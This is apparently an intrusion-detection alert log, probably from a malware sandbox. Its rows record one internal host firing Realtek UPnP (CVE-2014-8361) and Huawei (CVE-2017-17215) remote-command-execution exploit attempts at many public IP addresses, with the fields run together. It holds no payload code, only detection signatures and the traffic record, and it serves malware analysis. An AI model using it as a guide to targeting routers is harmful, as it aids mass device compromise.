                                      07/20/24-23:01:25.600782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5652252869192.168.2.23157.108.156.75
                                      07/20/24-23:01:42.960666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4342852869192.168.2.2384.203.232.104
                                      07/20/24-23:01:55.384732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23907252869192.168.2.2360.14.147.228
                                      07/20/24-23:01:41.380561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4479852869192.168.2.23184.103.85.217
                                      07/20/24-23:01:42.729310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4867652869192.168.2.23159.222.212.200
                                      07/20/24-23:01:53.041672TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614615252869192.168.2.23164.75.171.71
                                      07/20/24-23:01:08.578727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019452869192.168.2.23169.193.81.146
                                      07/20/24-23:01:43.621955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4878452869192.168.2.2364.190.167.168
                                      07/20/24-23:01:02.059312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591237215192.168.2.23157.19.254.108
                                      07/20/24-23:01:48.834295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5862252869192.168.2.2371.14.67.20
                                      07/20/24-23:01:27.725851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754837215192.168.2.23197.43.142.84
                                      07/20/24-23:01:13.628544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5029252869192.168.2.2390.205.64.234
                                      07/20/24-23:01:48.955750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616008052869192.168.2.23105.224.21.3
                                      07/20/24-23:01:44.408559TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614371252869192.168.2.23209.24.146.250
                                      07/20/24-23:01:43.944379TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25467052869192.168.2.2335.7.41.237
                                      07/20/24-23:01:00.639011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409837215192.168.2.2341.239.125.129
                                      07/20/24-23:01:31.974837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721037215192.168.2.2341.105.201.33
                                      07/20/24-23:01:02.345084TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616078452869192.168.2.23178.251.54.152
                                      07/20/24-23:02:02.509837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5485452869192.168.2.2341.136.217.138
                                      07/20/24-23:01:31.333071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3428852869192.168.2.23121.166.138.14
                                      07/20/24-23:01:46.530676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4842252869192.168.2.2345.122.145.145
                                      07/20/24-23:02:07.969418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4664852869192.168.2.2394.27.30.164
                                      07/20/24-23:01:20.175900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805837215192.168.2.2377.95.4.242
                                      07/20/24-23:01:12.807274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5310052869192.168.2.23166.63.2.220
                                      07/20/24-23:01:48.155981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615244052869192.168.2.23155.185.16.155
                                      07/20/24-23:01:27.660100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195837215192.168.2.23197.195.116.74
                                      07/20/24-23:01:24.126316TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613878652869192.168.2.23184.74.79.160
                                      07/20/24-23:01:44.914703TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24269852869192.168.2.23183.141.159.182
                                      07/20/24-23:01:58.093784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4074652869192.168.2.23151.217.152.189
                                      07/20/24-23:01:01.437626TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616014452869192.168.2.23205.32.150.55
                                      07/20/24-23:01:52.940746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613687652869192.168.2.23159.143.86.166
                                      07/20/24-23:01:51.833558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597452869192.168.2.23207.100.140.133
                                      07/20/24-23:01:50.223705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5033452869192.168.2.2336.88.70.103
                                      07/20/24-23:01:42.634606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26026252869192.168.2.2387.53.250.191
                                      07/20/24-23:01:08.609855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24596452869192.168.2.23168.54.72.251
                                      07/20/24-23:01:47.709674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4742052869192.168.2.2357.16.142.227
                                      07/20/24-23:01:51.944007TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26076652869192.168.2.23194.155.182.26
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720837215192.168.2.2341.201.15.228
                                      07/20/24-23:01:41.270795TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615837052869192.168.2.23112.83.62.168
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368437215192.168.2.23157.33.11.159
                                      07/20/24-23:01:47.995202TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25724252869192.168.2.23102.51.73.237
                                      07/20/24-23:01:48.596773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787252869192.168.2.23133.40.152.48
                                      07/20/24-23:02:03.987678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4041052869192.168.2.2395.249.40.161
                                      07/20/24-23:01:01.505774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613545852869192.168.2.23126.16.187.60
                                      07/20/24-23:01:08.588009TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24868652869192.168.2.23210.116.25.221
                                      07/20/24-23:01:54.345401TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614470452869192.168.2.2367.25.105.249
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095037215192.168.2.2341.85.182.81
                                      07/20/24-23:01:41.449345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614210652869192.168.2.23174.130.13.191
                                      07/20/24-23:01:34.043766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004037215192.168.2.2341.243.122.81
                                      07/20/24-23:01:48.356835TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23473452869192.168.2.23175.186.207.187
                                      07/20/24-23:01:47.474975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3643452869192.168.2.2313.165.214.181
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503237215192.168.2.23157.249.222.130
                                      07/20/24-23:00:59.201622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639637215192.168.2.2381.147.177.5
                                      07/20/24-23:01:02.444710TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5044252869192.168.2.234.194.116.48
                                      07/20/24-23:01:44.663524TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24733252869192.168.2.23132.102.241.51
                                      07/20/24-23:01:46.340763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4072252869192.168.2.2363.243.31.167
                                      07/20/24-23:01:04.987638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4457452869192.168.2.23216.207.228.137
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971037215192.168.2.2323.247.196.153
                                      07/20/24-23:01:11.820149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755837215192.168.2.2341.247.75.173
                                      07/20/24-23:01:52.684130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3660652869192.168.2.2375.139.110.226
                                      07/20/24-23:01:27.658221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906637215192.168.2.2341.105.180.115
                                      07/20/24-23:01:46.810790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4370652869192.168.2.23154.173.158.60
                                      07/20/24-23:01:42.244235TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613630652869192.168.2.23111.252.176.80
                                      07/20/24-23:01:56.845732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4618852869192.168.2.2379.6.78.78
                                      07/20/24-23:01:31.312186TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23898652869192.168.2.2361.127.88.100
                                      07/20/24-23:01:11.822392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241437215192.168.2.23157.93.68.27
                                      07/20/24-23:01:40.321300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080237215192.168.2.23197.55.198.212
                                      07/20/24-23:01:31.313163TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25399652869192.168.2.2323.131.141.174
                                      07/20/24-23:01:34.062277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557437215192.168.2.23157.190.228.200
                                      07/20/24-23:01:27.766239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861637215192.168.2.23197.72.179.4
                                      07/20/24-23:01:53.372532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615239252869192.168.2.23109.249.3.178
                                      07/20/24-23:01:42.285526TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25570252869192.168.2.23174.30.181.131
                                      07/20/24-23:01:44.868029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3932052869192.168.2.2324.28.111.138
                                      07/20/24-23:01:42.189694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615817052869192.168.2.2350.61.91.2
                                      07/20/24-23:01:43.324295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5376452869192.168.2.2335.7.41.237
                                      07/20/24-23:01:59.745622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614197852869192.168.2.23144.252.195.82
                                      07/20/24-23:01:24.575344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4833252869192.168.2.23166.142.205.252
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469437215192.168.2.2341.47.64.65
                                      07/20/24-23:01:46.983381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4132652869192.168.2.2337.20.218.143
                                      07/20/24-23:01:41.987411TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614304252869192.168.2.23107.189.251.198
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764237215192.168.2.2341.41.194.11
                                      07/20/24-23:01:42.233741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24855252869192.168.2.2391.23.23.187
                                      07/20/24-23:01:43.091220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615642852869192.168.2.23133.252.225.26
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642237215192.168.2.2341.152.253.87
                                      07/20/24-23:01:02.123155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4674652869192.168.2.23113.241.155.67
                                      07/20/24-23:01:53.041672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4112852869192.168.2.23115.138.89.148
                                      07/20/24-23:02:07.493932TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614824652869192.168.2.23140.7.17.21
                                      07/20/24-23:01:42.406731TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614644852869192.168.2.2338.105.221.242
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665637215192.168.2.23157.47.11.186
                                      07/20/24-23:01:27.649912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006237215192.168.2.23197.206.255.142
                                      07/20/24-23:01:41.349768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615603452869192.168.2.231.167.45.35
                                      07/20/24-23:01:45.010540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25346252869192.168.2.23192.54.139.100
                                      07/20/24-23:00:57.222279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411037215192.168.2.2341.81.198.30
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205637215192.168.2.2360.14.209.187
                                      07/20/24-23:01:00.638418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739237215192.168.2.23197.151.222.142
                                      07/20/24-23:01:08.903232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5170452869192.168.2.23131.199.217.59
                                      07/20/24-23:01:41.750477TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4795852869192.168.2.23197.168.237.206
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337837215192.168.2.23157.223.84.102
                                      07/20/24-23:01:42.145997TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615876252869192.168.2.23104.27.90.68
                                      07/20/24-23:01:42.696197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614462852869192.168.2.2324.42.93.65
                                      07/20/24-23:01:51.405782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615497252869192.168.2.2313.25.11.108
                                      07/20/24-23:01:08.560530TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4397652869192.168.2.23157.99.82.194
                                      07/20/24-23:01:51.360754TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615461052869192.168.2.23173.40.109.207
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.2341.197.138.116
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547837215192.168.2.2346.114.222.105
                                      07/20/24-23:01:41.919931TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23279852869192.168.2.23147.68.197.111
                                      07/20/24-23:01:53.234960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3688052869192.168.2.23217.154.142.187
                                      07/20/24-23:01:42.611005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5634252869192.168.2.23165.21.238.229
                                      07/20/24-23:01:42.499887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3562252869192.168.2.2399.176.241.96
                                      07/20/24-23:01:51.086033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5996852869192.168.2.23106.9.90.86
                                      07/20/24-23:01:03.159715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4955052869192.168.2.2378.39.181.117
                                      07/20/24-23:01:55.546480TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25662452869192.168.2.23174.141.27.208
                                      07/20/24-23:01:31.312411TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337652869192.168.2.2389.183.176.41
                                      07/20/24-23:01:00.634089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511037215192.168.2.23157.73.230.79
                                      07/20/24-23:01:34.044293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077637215192.168.2.23157.116.8.136
                                      07/20/24-23:01:50.255748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6079452869192.168.2.2379.217.40.139
                                      07/20/24-23:01:55.741840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002252869192.168.2.238.205.247.218
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775237215192.168.2.23157.108.180.162
                                      07/20/24-23:01:56.828807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4660852869192.168.2.2343.127.30.131
                                      07/20/24-23:01:43.044692TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613365852869192.168.2.2378.241.170.132
                                      07/20/24-23:01:31.978142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130637215192.168.2.23157.174.110.166
                                      07/20/24-23:01:46.298100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5735252869192.168.2.23203.221.6.21
                                      07/20/24-23:01:02.280127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3639252869192.168.2.23161.20.12.87
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.23157.151.81.4
                                      07/20/24-23:01:43.906354TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4055252869192.168.2.23169.102.32.106
                                      07/20/24-23:01:51.354566TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614843452869192.168.2.23187.61.181.140
                                      07/20/24-23:01:42.536855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6021052869192.168.2.23100.0.247.159
                                      07/20/24-23:01:43.596881TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613547652869192.168.2.23108.48.65.201
                                      07/20/24-23:01:42.014835TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615501052869192.168.2.23117.174.229.249
                                      07/20/24-23:01:10.550846TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615284652869192.168.2.23195.196.57.80
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395237215192.168.2.2341.118.38.95
                                      07/20/24-23:01:02.054387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.2341.45.210.158
                                      07/20/24-23:01:54.562310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5773652869192.168.2.23120.165.99.108
                                      07/20/24-23:02:05.476791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5621452869192.168.2.2393.40.207.17
                                      07/20/24-23:01:42.647416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5841852869192.168.2.2391.15.191.58
                                      07/20/24-23:01:10.987935TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3625852869192.168.2.23126.12.83.193
                                      07/20/24-23:01:45.109958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156252869192.168.2.23190.1.92.156
                                      07/20/24-23:01:44.520254TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615985852869192.168.2.2338.85.208.126
                                      07/20/24-23:01:25.288586TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613327452869192.168.2.2347.20.172.49
                                      07/20/24-23:01:08.582150TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25093052869192.168.2.23124.144.192.144
                                      07/20/24-23:01:04.100971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928237215192.168.2.23197.119.219.206
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3502037215192.168.2.23197.1.124.246
                                      07/20/24-23:01:54.053348TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24815252869192.168.2.23212.188.148.79
                                      07/20/24-23:01:59.707284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615591852869192.168.2.23137.0.161.120
                                      07/20/24-23:01:31.320679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26089052869192.168.2.2379.157.163.186
                                      07/20/24-23:01:44.468208TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615076652869192.168.2.23133.169.65.78
                                      07/20/24-23:01:54.930155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4016052869192.168.2.23197.213.222.122
                                      07/20/24-23:01:42.499887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286452869192.168.2.23199.182.118.208
                                      07/20/24-23:01:46.893328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4716852869192.168.2.2398.147.36.143
                                      07/20/24-23:01:54.957644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966652869192.168.2.2341.28.215.223
                                      07/20/24-23:01:42.890948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4994252869192.168.2.23149.51.58.185
                                      07/20/24-23:01:53.267116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5710052869192.168.2.2367.228.135.229
                                      07/20/24-23:01:01.406953TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614397852869192.168.2.23148.117.206.184
                                      07/20/24-23:00:59.185032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630437215192.168.2.2341.41.122.187
                                      07/20/24-23:01:43.622289TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24237652869192.168.2.2375.212.169.191
                                      07/20/24-23:01:09.021221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918452869192.168.2.2344.188.193.15
                                      07/20/24-23:01:52.569791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5250652869192.168.2.2365.85.212.42
                                      07/20/24-23:01:43.489480TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25314652869192.168.2.23171.210.7.241
                                      07/20/24-23:01:08.607816TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24873652869192.168.2.2364.86.139.164
                                      07/20/24-23:01:27.655551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460237215192.168.2.23157.254.243.46
                                      07/20/24-23:01:42.519318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5359252869192.168.2.23196.168.75.104
                                      07/20/24-23:02:02.632381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320852869192.168.2.2388.40.199.176
                                      07/20/24-23:01:14.103467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918037215192.168.2.23197.49.55.120
                                      07/20/24-23:01:11.634077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552637215192.168.2.23193.53.98.68
                                      07/20/24-23:01:31.323042TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24322652869192.168.2.2319.16.79.3
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926837215192.168.2.2341.224.244.226
                                      07/20/24-23:01:41.467111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5592852869192.168.2.23201.170.107.7
                                      07/20/24-23:01:50.257796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613923052869192.168.2.23173.68.146.233
                                      07/20/24-23:01:06.996055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282637215192.168.2.2341.52.198.36
                                      07/20/24-23:01:06.973541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.23150.244.11.188
                                      07/20/24-23:01:34.045749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324237215192.168.2.23157.42.95.98
                                      07/20/24-23:01:26.010869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5514252869192.168.2.23221.42.114.149
                                      07/20/24-23:01:02.104572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488237215192.168.2.2341.174.61.133
                                      07/20/24-23:01:27.655551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491637215192.168.2.23157.84.55.40
                                      07/20/24-23:01:44.728463TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615260252869192.168.2.23204.16.50.125
                                      07/20/24-23:01:43.185498TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3743652869192.168.2.2357.234.190.125
                                      07/20/24-23:01:12.813695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3674052869192.168.2.23126.12.83.193
